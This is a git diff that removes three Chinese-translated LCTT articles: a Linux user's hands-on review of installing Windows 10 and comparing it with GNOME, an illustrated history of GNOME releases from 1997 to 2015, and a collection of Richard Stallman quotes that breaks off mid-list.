-你也可以直接打开: [https://www.microsoft.com/en_us/software-download/Windows10[1]
-
-2. 微软要求我从Windows 10, Windows 10 KN, Windows 10 N 和Windows 10 单语言版中选择一个版本
-
-![Select Windows 10 Edition](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Windows-10-Edition.jpg)
-
-选择版本
-
-以下是各个版本的简略信息:
-
-- Windows 10 - 包含微软提供给我们的所有软件
-- Windows 10N - 此版本不包含媒体播放器
-- Windows 10KN - 此版本没有媒体播放能力
-- Windows 10单语言版 - 仅预装一种语言
-
-3. 我选择了第一个选项 " Windows 10"并且单击"确认".之后我要选择语言,我选择了"英语"
-
-微软给我提供了两个下载链接.一个是32位版,另一个是64位版.我单击了64位版--这与我的电脑架构相同.
-
-![Download Windows 10](http://www.tecmint.com/wp-content/uploads/2015/08/Download-Windows-10.jpg)
-
-下载Windows 10
-
-我的带宽是15M的,下载了整整3个小时.不幸的是微软没有提供系统的种子文件,否则整个过程会更加舒畅.镜像大小为 3.8 GB(译者注:就我的10M小水管,我使用迅雷下载用时50分钟).
-
-我找不到更小的镜像,微软并没有为Windows提供网络安装镜像.我也没有办法在下载完成后去校验哈希值.
-
-我十分惊讶,Windows在这样的问题上居然如此漫不经心.为了验证这个镜像是否正确下载,我需要把它刻到光盘上或者复制到我的U盘上然后启动它,一直静静的看着它安装直到安装完成.
-
-首先,我用dd命令将win10的iso镜像刻录到U盘上
-
- # dd if=/home/avi/Downloads/Win10_English_x64.iso of=/dev/sdb1 bs=512M; sync
-
-这需要一点时间.在此之后我重启系统并在UEFI(BIOS)设置中选择从我的U盘启动.
-
-#### 系统要求 ####
-
-升级
-
-- 仅支持从Windows 7 SP1或者Windows 8.1升级
-
-重新安装
-
-- 处理器: 1GHz 以上
-- 内存: 1GB以上(32位),2GB以上(64位)
-- 硬盘: 16GB以上(32位),20GB以上(64位)
-- 显卡: 支持DirectX 9或更新 + WDDM 1.0 驱动
-
-###Windows 10 安装过程###
-
-1. Windows 10启动成功了.他们又换了logo,但是仍然没有信息提示我它正在做什么.
-
-![Windows 10 Logo](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-10-Logo.jpg)
-
-Windows 10 Logo
-
-2. 选择安装语言,时区,键盘,输入法,点击下一步
-
-![Select Language and Time](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Language-and-Time.jpg)
-
-选择语言和时区
-
-3. 点击'现在安装'
-
-![Install Windows 10](http://www.tecmint.com/wp-content/uploads/2015/08/Install-Windows-10.jpg)
-
-安装Windows 10
-
-4. 下一步是输入密钥,我点击了跳过
-
-![Windows 10 Product Key](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-10-Product-Key.jpg)
-
-Windows 10 产品密钥
-
-5. 从列表中选择一个系统版本.我选择了Windows 10专业版
-
-![Select Install Operating System](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Install-Operating-System.jpg)
-
-选择系统版本
-
-6. 到了协议部分,选中"我接受"然后点击下一步
-
-![Accept License](http://www.tecmint.com/wp-content/uploads/2015/08/Accept-License.jpg)
-
-同意协议
-
-7. 下一步是选择(从Windows的老版本)升级到Windows 10或者安装Windows.我搞不懂为什么微软要让我自己选择:"安装Windows"被微软建议为"高级"选项.但是我还是选择了"安装Windows".
-
-![Select Installation Type](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Installation-Type.jpg)
-
-选择安装类型
-
-8. 选择驱动器,点击"下一步"
-
-![Select Install Drive](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Install-Drive.jpg)
-
-选择安装盘
-
-9. 安装程序开始复制文件,准备文件,安装更新,之后进行收尾.(如果安装程序能在安装时输出一堆字符来表示他在做什么就更好了)
-
-![Installing Windows](http://www.tecmint.com/wp-content/uploads/2015/08/Installing-Windows.jpg)
-
-安装 Windows
-
-10. 在此之后Windows重启了.他们说为了继续,我们需要重启
-
-![Windows Installation Process](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-Installation-Process.jpg)
-
-安装进程
-
-11. 我看到了一个写着"正在准备Windows"的界面.它停了整整五分多钟,仍然没有说明它正在做什么.没有输出.
-
-![Windows Getting Ready](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-Getting-Ready.jpg)
-
-正在准备Windows
-
-12. 又到了输入产品密钥的时间.我点击了"以后再说",并使用快速设置
-
-![Enter Product Key](http://www.tecmint.com/wp-content/uploads/2015/08/Enter-Product-Key.jpg)
-
-输入产品密钥
-
-![Select Express Settings](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Express-Settings.jpg)
-
-使用快速设置
-
-
-13. 又出现了三个界面,作为Linux用户我认为此处应有信息来告诉我安装程序在做什么,但是我想多了
-![Loading Windows](http://www.tecmint.com/wp-content/uploads/2015/08/Loading-Windows.jpg)
-
-载入 Windows
-
-![Getting Updates](http://www.tecmint.com/wp-content/uploads/2015/08/Getting-Updates.jpg)
-
-获取更新
-
-![Still Loading Windows](http://www.tecmint.com/wp-content/uploads/2015/08/Still-Loading-Windows.jpg)
-
-还是载入 Windows
-
-14. 安装程序想要知道谁拥有这台机器,"我的组织"或者我自己
-
-![Select Organization](http://www.tecmint.com/wp-content/uploads/2015/08/Select-Organization.jpg)
-
-选择组织
-
-15. 安装程序提示我加入"Aruze Ad"或者"加入域".在单击继续之前,我选择了后者.
-
-![Connect Windows](http://www.tecmint.com/wp-content/uploads/2015/08/Connect-Windows.jpg)
-
-连接网络
-
-16. 安装程序让我新建一个账户.所以我输入了 "user_name"并点击下一步,我觉得我会收到一个要求我必须输入密码的信息.
-
-![Create Account](http://www.tecmint.com/wp-content/uploads/2015/08/Create-Account.jpg)
-
-新建账户
-
-17. 让我惊讶的是Windows甚至都没有警告/发现我必须创建密码.真粗心.不管怎样,现在我可以体验系统了.
-
-![Windows 10 Desktop](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-10-Desktop.jpg)
-
-Windows 10的桌面环境
-
-#### Linux用户(我)直到现在的体验 ####
-
-- 没有网络安装镜像
-- 镜像文件太臃肿了
-- 没有验证iso是否为正确的方法(官方没有提供哈希值)
-- 启动与安装方式仍然与XP,Win 7,Win 8相同(可能吧...)
-- 和以前一样,安装程序没有输出他正在干什么 - 正在复制什么和正在安装什么软件包
-- 安装程序比Linux发行版的更加直白和简单
-
-####测试 Windows####
-
-18. 默认桌面很干净,上面只有一个回收站图标.我们可以直接从桌面搜索网络.底部的快捷方式分别是任务预览,网络,微软应用商店.和以前的版本一样,消息栏在右下角.
-
-![ ](http://www.tecmint.com/wp-content/uploads/2015/08/Deskop-Shortcut-icons.jpg)
-
-桌面图标
-
-19. IE浏览器被换成了Edge浏览器.微软把他们的老IE换成了Edge(斯巴达计划)
-
-![Microsoft Edge Browser](http://www.tecmint.com/wp-content/uploads/2015/08/Edge-browser.jpg)
-
-Edge浏览器
-
-这个浏览器至少比IE要快.他们有相同的用户界面.它的主页包含新的更新.它还有一个标题是"下一步怎么走".由于它全面的性能提升,它的加载速度非常快.Edge的内存占用看起来一般般.
-
-![Windows Performance](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-Performance.jpg)
-
-性能
-
-Edge也有小娜加成 -- 智能个人助理.支持笔记(在浏览网页时记笔记),分享(在本TAB分享而不必打开其他TAB)
-
-#### Linux用户(我)此时体验 ####
-
-20. 微软确实提升了网页浏览体验.我们要看的就是他的稳定性和质量.现在它并不落后.
-
-21. 对我来说,Edge的内存占用不算太大.但是有很多用户抱怨他的内存占用.
-
-22. 很难说目前Edge已经准备好了与火狐或Chrome竞争.让我们静观其变.
-
-#### 更多的视觉体验 ####
-
-23. 重新设计的开始菜单 -- 看起来很简洁高效.Merto磁贴大部分都会动.预先放置了最通用的应用.
-
-![Windows Look and Feel](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-Look.jpg)
-
-Windows
-
-在Linux的Gnome桌面环境下.我仅仅需要按下Win键并输入应用名就可以搜索应用.
-
-![Search Within Desktop](http://www.tecmint.com/wp-content/uploads/2015/08/Search-Within-Desktop.jpg)
-
-桌面内进行搜索
-
-24. 文件浏览器 -- 设计的很简洁.左边是进入文件夹的快捷方式.
-
-![Windows File Explorer](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-File-Explorer.jpg)
-
-Windows资源管理器
-
-我们的Gnome下的文件管理也同样的简洁高效.
-
-![File Browser on Gnome](http://www.tecmint.com/wp-content/uploads/2015/08/File-Browser.jpg)
-
-Gnome 的文件管理
-
-25. 设置 -- 尽管Windows 10的设置有点精炼,但是我们还是可以把它与linux的设置进行对比.
-
-**Windows 的设置**
-
-![Windows 10 Settings](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-10-Settings.jpg)
-
-Windows 10 设置
-
-**Linux Gnome 上的设置**
-
-![Gnome Settings](http://www.tecmint.com/wp-content/uploads/2015/08/Gnome-Settings.jpg)
-
-Gnome 的设置
-
-26. 应用列表 -- 目前,Linux上的应用列表比之前的版本要好一些
-
-**Windows 的应用列表**
-
-![Application List on Windows 10](http://www.tecmint.com/wp-content/uploads/2015/08/Application-List-on-Windows-10.jpg)
-
-Windows 10 的应用列表
-
-**Gnome3 的应用列表**
-
-![Gnome Application List on Linux](http://www.tecmint.com/wp-content/uploads/2015/08/Gnome-Application-List-on-Linux.jpg)
-
-Gnome3 的应用列表
-
-27. 虚拟桌面 -- Windows 10 上的虚拟桌面是近来被提及最多的特性之一
-
-这是Windows 10 上的虚拟桌面.
-
-![Windows Virtual Desktop](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-Virtual-Desktop.jpg)
-
-Windows的虚拟桌面
-
-这是我们Linux用户使用了超过20年的虚拟桌面.
-
-![Virtual Desktop on Linux](http://www.tecmint.com/wp-content/uploads/2015/08/Virtual-Desktop-on-Linux.jpg)
-
-Linux的虚拟桌面
-
-#### Windows 10 的其他新特性 ####
-
-28. Windows 10 自带wifi感知.它会把你的wifi密码分享给他人.任何在你wifi范围内并且曾经通过Skype, Outlook, Hotmail 或 Facebook与你联系的人都能够获得你的网络接入权.这个特性的本意是让用户可以省时省力的连接网络.
-
-在微软对于 Tecmint 的问题的回答中,他们说道 -- 用户需要在每次到一个新的网络环境时自己去同意打开wifi感知.如果我们考虑到网络安全这将是很不安全的一件事.微软的说法并没有说服我.
-
-29. 从Windows 7 和 Windows 8.1升级可以省下买新版的花费.(家庭版$119 专业版$199 )
-
-30. 微软发布了第一个累积更新,这个更新在一小部分设备上会让系统一直重启.Windows可能不知道这个问题或者不知道它发生的原因.
-
-31. 微软内建的禁用/隐藏我不想要的更新的功能在我这不起作用.这意味着一旦更新开始推送,你没有方法去禁用/隐藏他们.对不住啦,Windows 用户.
-
-#### Windows 10 包含的来源于Linux的功能 ####
-
-Windows 10有很多直接取自Linux的功能.如果Linux不已GPL发布的话,以下下这些功能永远不会出现在Windows上.
-
-32. 包管理器 -- 是的,你没有听错!Windows 10内建了一个包管理器.它只在Power Shell下工作.OneGet是Windows的官方包管理器.
-
-![Windows 10 Package Manager](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-10-Package-Manager.jpg)
-
- Windows 10的包管理器
-
-- 无国界的Windows
-- 扁平化图标
-- 虚拟桌面
-- 离线/在线搜索一体化
-- 手机/桌面系统一体化
-
-### 总体印象###
-
-- 响应速度提升
-- 动画很好看
-- 资源占用少
-- 电池续航提升
-- Edge浏览器坚如磐石
-- 支持树莓派 2
-- Windows 10好的原因是Windows 8/8.1没有达到公众预期并且坏的可以
-- 旧瓶装新酒:Windows 10基本上就是以前的那一套换上新的图标
-
-测试后我对Windows 10的评价是:Windows 10 在视觉和感觉上做了一些更新(就如同Windows经常做的那样).我要为斯巴达计划,虚拟桌面,命令行包管理器,整合在线/离线搜索的搜索栏点赞.这确实是一个更新后的产品 ,但是认为Windows 10将是Linux的最后一个棺材钉的人错了.
-
-Linux走在Windows前面.它们的做事方法并不相同.在以后的一段时间里Windows不会站到Linux这一旁.Linux用户也不必去使用Windows 10.
-
-这就是我要说的.希望你喜欢本文.如果你们喜欢本篇文章我会再写一些你们喜欢读的有趣的文章.在下方留下你的有价值的评论.
-
---------------------------------------------------------------------------------
-
-via: http://www.tecmint.com/a-linux-user-using-Windows-10-after-more-than-8-years-see-comparison/
-
-作者:[vishek Kumar][a]
-译者:[name1e5s](https://github.com/name1e5s)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.tecmint.com/author/avishek/
-[1]:https://www.microsoft.com/en-us/software-download/Windows10ISO
diff --git a/translated/talk/20151020 18 Years of GNOME Design and Software Evolution--Step by Step.md b/translated/talk/20151020 18 Years of GNOME Design and Software Evolution--Step by Step.md
deleted file mode 100644
index 614f10bb85..0000000000
--- a/translated/talk/20151020 18 Years of GNOME Design and Software Evolution--Step by Step.md
+++ /dev/null
@@ -1,200 +0,0 @@
-
-一步一脚印:GNOME十八年进化史
-================================================================================
-注:youtube 视频
-
-
-[GNOME][1] (GNU Object Model Environment)由两位墨西哥的程序员Miguel de Icaza和Federico Mena 始创于1997年8月15日。GNOME自由软件的桌面环境和应用程序计划由志愿者和全职开发者来开发。所有的GNOME桌面环境都由开源软件组成,并且支持Linux, FreeBSD, OpenBSD 等操作系统。
-
-现在就让我穿越到1997年来看看GNOME的第一个版本:
-
-### GNOME 1 ###
-
-![GNOME 1.0 - First major GNOME release](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/1.0/gnome.png)
-
-**GNOME 1.0** (1997) – GNOME 发布的第一个版本
-
-![GNOME 1.2 Bongo](https://raw.githubusercontent.com/paulcarroty/Articles/master/GNOME_History/1.2/1361441938.or.86429.png)
-
-**GNOME 1.2** “Bongo”, 2000
-
-![GNOME 1.4 Tranquility](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/1.4/1.png)
-
-**GNOME 1.4** “Tranquility”, 2001
-
-### GNOME 2 ###
-
-![GNOME 2.0](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.0/1.png)
-
-**GNOME 2.0**, 2002
-
-基于GTK+2的重大更新。引入了人机界面指南。
-
-![GNOME 2.2](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.2/GNOME_2.2_catala.png)
-
-**GNOME 2.2**, 2003
-
-改进了多媒体和文件管理器。
-
-![GNOME 2.4 Temujin](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.4/gnome-desktop.png)
-
-**GNOME 2.4** “Temujin”, 2003
-
-首次发布Epiphany浏览器,增添了辅助功能。
-
-![GNOME 2.6](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.6/Adam_Hooper.png)
-
-**GNOME 2.6**, 2004
-
-启用Nautilus空间文件管理工具同时引入了新的GTK+ (译注:跨平台图形用户界面工具包)对话框。这个转瞬即逝的版本变更被称做是GNOME的一个分支:GoneME。
-
-![GNOME 2.8](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.8/3.png)
-
-**GNOME 2.8**, 2004
-
-改良了对可移动设备的支持并新增了Evolution邮件应用。
-
-![GNOME 2.10](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.10/GNOME-Screenshot-2.10-FC4.png)
-
-**GNOME 2.10**, 2005
-
-减小内存需求,改进显示界面。增加网络控制、磁盘挂载和回收站组件以及Totem影片播放器和Sound Juicer CD抓取工具。
-
-![GNOME 2.12](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.12/gnome-livecd.jpg)
-
-**GNOME 2.12**, 2005
-
-改进了Nautilus以及跨平台剪切/粘贴功能的整合。 新增Evince PDF阅读器;新预设主题Clearlooks;新增菜单编辑器、管理员工具与环状管理器。基于支持Cairo的GTK+2.8。
-
-![GNOME 2.14](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.14/debian4-stable.jpg)
-
-**GNOME 2.14**, 2006
-
-改善显示效果;增强易用性;基于GStreamer 0.10多媒体框架。增加了Ekiga视频会议应用,Deskbar搜索工具,Pessulus权限管理器,和Sabayon系统管理员工具和快速切换用户功能。
-
-![GNOME 2.16](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.16/Gnome-2.16-screenshot.png)
-
-**GNOME 2.16**, 2006
-
-界面改良。增加了Tomboy笔记应用,Baobab磁盘用量分析应用,Orca屏幕朗读器以及GNOME 电源管理程序(以延长笔记本电池寿命);改进了Totem, Nautilus, 使用了新的图标主题。基于GTK+ 2.0 的全新显示对话框。
-
-![GNOME 2.18](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.18/Gnome-2.18.1.png)
-
-**GNOME 2.18**, 2007
-
-界面改良。增加了Seahorse GPG安全应用,可以对邮件和本地文件进行加密;Baobab增加了环状图表显示方式;改进了Orca,Evince, Epiphany, GNOME电源管理,音量控制;增加了两款新游戏:GNOME数独和国际象棋。支持MP3和AAC音频解码。
-
-![GNOME 2.20](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.20/rnintroduction-screenshot.png)
-
-**GNOME 2.20**, 2007
-
-发布十周年版本。Evolution增加了备份功能;改进了Epiphany,EOG,GNOME电源管理以及Seahorse中的Keyring密码管理方式;在Evince中可以编辑PDF文档;文件管理界面中整合了搜索模块;自动安装多媒体解码器。
-
-![GNOME 2.22, 2008](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.22/GNOME-2-22-2-Released-2.png)
-
-**GNOME 2.22**, 2008
-
-新增Cheese应用,它是一个可以截取网络摄像头和远程桌面图像的工具;Metacity支持基本的窗口叠加复合;引入GVFS(译注:GNOME Virtual file system,GNOME虚拟文件系统);改善了Totem播放DVD 和YouTube的效果,支持播放MythTV;在Evolution中新增了谷歌日历以及为信息添加标签的功能;改进了Evince, Tomboy, Sound Juicer和计算器。
-
-![GNOME 2.24](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.24/gnome-224.jpg)
-
-**GNOME 2.24**, 2008
-
-新增了Empathy即时通讯软件,Ekiga升级至3.0版本;Nautilus支持标签式浏览,更好的支持了多屏幕显示方式和数字电视功能。
-
-![GNOME 2.26](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.26/gnome226-large_001.jpg)
-
-**GNOME 2.26**, 2009
-
-新增光盘刻录应用Brasero;简化了文件分享的流程,改进了媒体播放器的性能;支持多显示器和指纹识别器。
-
-![GNOME 2.28](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.28/1.png)
-
-**GNOME 2.28**, 2009
-
-增加了GNOME 蓝牙模块;改进了Epiphany ,Empathy,时间追踪器和辅助功能。GTK+升级至2.18版本。
-
-![GNOME 2.30](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.30/GNOME2.30.png)
-
-**GNOME 2.30**, 2010
-
-改进了Nautilus,Empathy,Tomboy,Evince,Time Tracker,Epiphany和 Vinagre。借助基于libimobiledevice(译注:支持iOS®设备跨平台使用的工具协议库)的GVFS可以访问部分iPod 和iPod Touch。
-
-![GNOME 2.32](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/2.32/gnome-2-32.png.en_GB.png)
-
-**GNOME 2.32**, 2010
-
-新增Rygel 媒体分享工具和GNOME色彩管理器;改进了Empathy即时通讯客户端,Evince,Nautilus文件管理器等。计划于2010年9月发布3.0版本,因此大部分开发者的精力都由2.3x转移至了3.0版本。
-
-### GNOME 3 ###
-
-![GNOME 3.0](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.0/chat-3-0.png)
-
-**GNOME 3.0**, 2011
-
-引入GNOME Shell,一个重新设计的、具有更简练更集中的选项的框架。基于Mallard标记语言的话题导向型帮助。支持窗口并列堆叠。启用新的视觉主题和字体。采用GTK+3.0,具有更好的语言绑定,主题,触控以及多平台支持。去除了长期弃用的API。
-
-![GNOME 3.2](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.2/gdm.png)
-
-**GNOME 3.2**, 2011
-
-支持在线帐户,Web应用;新增通讯录应用和文档文件管理器;文件管理器支持快速预览;整合性能,更新文档以及对外观的一些小改进。
-
-![GNOME 3.4](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.4/application-view.png)
-
-**GNOME 3.4**, 2012
-
-全新的GNOME 3 应用程序外观:文件,Epiphany(更名为Web),GNOME 通讯录。可以在Activities Overview中搜索本地文件。支持应用菜单。焕然一新的界面元素:崭新的颜色拾取器,重新设计的滚动条,更易使用的旋转按钮以及可隐藏的标题栏。支持视角平滑。全新的动态壁纸。在系统设置中增添了对Wacom数位板的支持。更简便的扩展应用管理。更好的硬件支持。面向主题的文档。在Empathy中提供了对视频电话和动态信息的支持。更好的辅助功能:提升Orca整合度,增强高对比度模式适配性,以及全新的缩放设置。大量应用和细节的改进。
-
-![GNOME 3.6](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.6/gnome-3-6.png)
-
-**GNOME 3.6**, 2012
-
-全新设计的核心元素:新的应用按钮和改进的Activities Overview布局。新的登陆锁定界面。重新设计的通知栏。通知现在更智能,可见性更高,同时更容易操作。改进了系统设置的界面和设定逻辑。用户菜单默认显示关机操作。整合了输入法。辅助功能一直开启。新的应用:Boxes虚拟机,在GNOME 3.4中发布了预览版。Clocks时钟, 可以显示世界时间。升级了磁盘用量分析,Empathy和 Font Viewer的外观。改进了Orca对布莱叶盲文的支持。 在Web浏览器中, 用最常访问页面取代了之前的空白起始页,增添了更好的全屏模式并使用了WebKit2测试版引擎. Evolution 开始使用WebKit提交邮件。 改进了磁盘功能。 改进了文件管理应用即之前的Nautilus, 新增诸如最近访问的文件和搜索等功能。
-
-![GNOME 3.8](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.8/applications-view.png)
-
-**GNOME 3.8**, 2013
-
-令人耳目一新的核心组件:新应用界面可以分别显示常用应用及全部应用,窗口布局得到全面改造。新的屏幕即现式输入法开关。通知和信息现在会对屏幕边缘的点击作出回应。为那些喜欢传统桌面的用户提供了经典模式。重新设计了设置界面的工具栏。新的初始化引导流程。GNOME 在线帐户添加了对更多供应商的支持。浏览器正式启用WebKit2引擎。文档支持双页模式并且整合了Google 文档。通讯录的UI升级。GNOME Files,GNOME Boxes和GNOME Disks都得到了大幅改进。两款全新的GNOME核心应用:GNOME时钟和GNOME天气。
-
-![GNOME 3.10](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.10/GNOME-3-10-Release-Schedule-2.png)
-
-**GNOME 3.10**, 2013
-
-全新设计的系统状态界面,能够更直观的纵览全局。一系列新应用,包括GNOME Maps, GNOME Notes, GNOME Music 和GNOME Photos。新的基于位置的功能,如自动时区和世界时间。支持高分辨率及智能卡。 基于GLib 2.38提供了对D-Bus的支持。
-
-![GNOME 3.12](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.12/app-folders.png)
-
-**GNOME 3.12**, 2014
-
-改进了Overview中的键盘导航和窗口选择,基于易用性测试对初始设置进行了修改。有线网络重新回到了状态栏上,在应用预览中可以自定义应用文件夹。在大量应用的对话框中引入了新的GTK+小工具同时使用了新的GTK+标签风格。GNOME Videos,GNOME 终端以及Gedit都改用了全新外观,更贴合HIG(译注:Human Interface Guidelines,人机界面指南)。在GNOME Shell的终端仿真器中提供了搜索预测功能。增强了对GNOME软件和高密度显示屏的支持。提供了新的录音工具。增加了新的桌面通知接口。在Wayland中的进程被置于更易使用的位置并可以进行选择性预览。
-
-![GNOME 3.14](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.14/Top-Features-of-GNOME-3-14-Gallery-459893-2.jpg)
-
-**GNOME 3.14**, 2014
-
-更炫酷的桌面环境效果,改善了对触摸屏的支持。GNOME Software supports managing installed add-ons. 在GNOME Photos中可以访问Google相册。重绘了Evince,数独,扫雷和天气应用的用户界面,同时增加了一款叫做Hitori 的GNOME游戏。
-
-![GNOME 3.16](https://github.com/paulcarroty/Articles/raw/master/GNOME_History/3.16/preview-apps.png)
-
-**GNOME 3.16**, 2015
-
-33,000处改变。主要修改了UI的配色方案。 增加了即现式滚动条。通知窗口中整合了日历应用。对文件管理器,图像查看器和地图等大量应用进行了微调。可以预览应用程序。进一步使用Wayland取代X11。
-
-感谢GNOME Project及[Wikipedia][2]提供的变更日志!感谢阅读!(译注:原文此处为“敬请期待”。)
-
-
---------------------------------------------------------------------------------
-
-via: https://tlhp.cf/18-years-of-gnome-evolution/
-
-作者:[Pavlo Rudyi][a]
-译者:[Haohong WANG](https://github.com/HaohongWANG)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://tlhp.cf/author/paul/
-[1]:https://www.gnome.org/
-[2]:https://en.wikipedia.org/wiki/GNOME
diff --git a/translated/talk/20151020 30 Years of Free Software Foundation--Best Quotes of Richard Stallman.md b/translated/talk/20151020 30 Years of Free Software Foundation--Best Quotes of Richard Stallman.md
deleted file mode 100644
index a8d1616106..0000000000
--- a/translated/talk/20151020 30 Years of Free Software Foundation--Best Quotes of Richard Stallman.md
+++ /dev/null
@@ -1,171 +0,0 @@
-30 年自由软件基金会:理查德·斯托曼语录集锦
-================================================================================
-注:youtube 视频
-
-
-**理查德·马修·斯托曼** (rms) – IT大牛之一。他是一名程序员,GCC、GDB、Emacs 的构建者,软件自由传教士,[GNU Project][1] 和 [FSF][2] 的创办人。
-
-**GNU** 是 “GNU’s Not Unix!”的缩写。GNU 是基于 Unix 操作系统的自由计算机软件集合。支持 GNU/Hurd 和 Linux 内核。于1983年9月27日公诸于众。常有组件:
-
-- GNU Compiler Collection (GCC)
-- GNU C library (glibc)
-- GNU Core Utilities (coreutils)
-- GNU Debugger (GDB)
-- GNU Binary Utilities (binutils)
-- GNU Bash shell
-- NOME desktop environment
-
-注:视频
-
-
-**自由软件基金会** (FSF) – 一个自由软件的非营利组织,致力于计算机用户自由的提升和权力的捍卫。于 1985 年 10 月 4 日成立。阅读[更多][3]。
-
-- 于目的无关,随心运行程序的自由(自由0)。
-- 学习程序如何运作,并改变它为你所用的自由(自由1)。可以访问源码是这条的前提。
-- 重新发布副本的自由,如此你便可以帮助你的邻居了 (自由 2)。
-- 发布自己修改版本给他人的自由(自由 3)。这样能让整个社区有机会从你的改变中受益。可以访问源码是这条的前提。
-
-以上为自由软件的四项自由原则。
-
-以下为理查德·斯托曼关于自由、软件、社交、哲学等的名言摘引。
-
-**关于 Facebook:**
-
-> Facebook 不是你的朋友,是监控引擎。
-
-**关于 Android:**
-
-> Android 和 GNU/Linux 有很大的区别,因为其中几乎没有 GNU。的确,Android 和 GNU/Linux 之间仅有一个共同组件,那就是内核 - Linux。
-
-**关于计算机行业:**
-
-> 计算机行业是唯一一个比时尚女装更被时尚驱动的行业。
-
-**关于云计算:**
-
-> 关于云计算,有趣的是我们已经重新定义了云计算来包含我们曾干的所有事。
-
-**关于伦理:**
-
-> 无论神存在与否,都没有绝对的伦理道德。没有这份理所当然,我们该如何?也唯有尽善吧。
-
-**关于自由:**
-
-> 自由软件是尊重个人自由和社会团结的软件。所以才能如自由般自由自在。
-
-**关于目标和理想:**
-
-> 如果你想为这世界做些什么,仅有理想是不够的,你需要找条通往目标的道路并走完。
-
-**关于分享:**
-
-> 分享很棒,而且数字化技术也使分享变得容易。
-
-**关于 facebook(进阶版):**
-
-> Facebook 蹂躏它们的用户。它不是你们的朋友;它就是个监控引擎。举个例子,你是否曾在一些网页或网站上看到 Facebook 的 “like” 按键。对,Facebook 知道你的电脑曾访问过那些网页。
-
-**关于 web 应用:**
-
-> 给你个为什么不应该使用 web 应用的理由,因为你失去了计算机的控制权。
->
-> 如果你使用私有程序或他人的 web 服务器,那么你只能任人鱼肉。被软件的软件的开发者轻易操纵。
-
-**关于书:**
-
-> 印刷出来的书,当然是自由的。即使你买了别人也不知道,这也是我一直买书的方式。买时不会被任何数据库认出。是亚马逊把自由夺走了。
-
-**关于 MPAA:**
-
-> MPAA 其实是美国电影协会(Motion Picture Association of America),但我认为叫做攻击万物的邪恶力量(Malicious Power Attacking All)更为合适。
-
-**关于金钱与职业:**
-
-> 我可以这样赚钱,并沉浸在编码的快乐中。但在职业生涯结束后,回首目睹自己筑就的高墙将人与人分隔开,我会觉得我耗尽毕生精力只换来了一个更糟糕的世界。
-
-**关于私有软件:**
-
-> 私有软件使用户孤立、无助。因为禁止将软件给他人使用所以孤立,因为无法改变源码所以无助。他们学不了其中正真的工作方式。所以整个私有软件体系就是一种不公的力量。
-
-**关于智能手机:**
-
-> 智能手机就是电脑 - 虽然做的和常用的电脑不同 - 但是却能干电脑能干的活。所以我们所说的一切有关于电脑上的软件应该能自由运行 - 必须坚持 - 在智能手机上也是这样。当然也包括平板。
-
-**关于 CD 和数字内容:**
-
-> CD 商店有一个弱势就是需要昂贵的库存,但是电子商店就没有这方面的需求:他们只需要将售卖的副本写入记忆棒,并在你忘带自己的记忆棒时卖你一个就是了。
-
-**关于竞争范式:About paradigm of competition:**
-
-> 竞争范式就像是赛跑:鼓励每一个跑得更快的人。当资本主义真的这样运作时,当然是件好事;但是维护者若是假设它一直这样运作的话那就大错特错了。
-
-**关于 vi 和 emacs:**
-
-> 有时会有人问我在 Emacs 的阵营使用 vi 是不是一种罪过。使用自由版的 vi 并不是一种罪过;是一种忏悔。所以好好享受其中乐趣吧。
-
-**关于自由和历史:**
-
-> 历史教会我们:珍惜自由,否则你将失去他。“别和我们谈政治”,对听不进的人这就是答复。
-
-**关于专利:**
-
-> 和专利一个一个的战斗并不能解决软件专利带来的危害,就像打再多的蚊子也消灭不了疟疾一样。
->
-> 软件专利对于软件的开发者来说十分危险,因为它们加剧了对于软件理念的垄断。
-
-**关于版权:**
-
-> 其实,版权制度对作者也没有什么好处,撇开最受欢迎的那个,其他作者的主旨可能更好理解,所以分享无论对他们还是你的读者都是一件好事。
-
-**关于工作与报酬:**
-
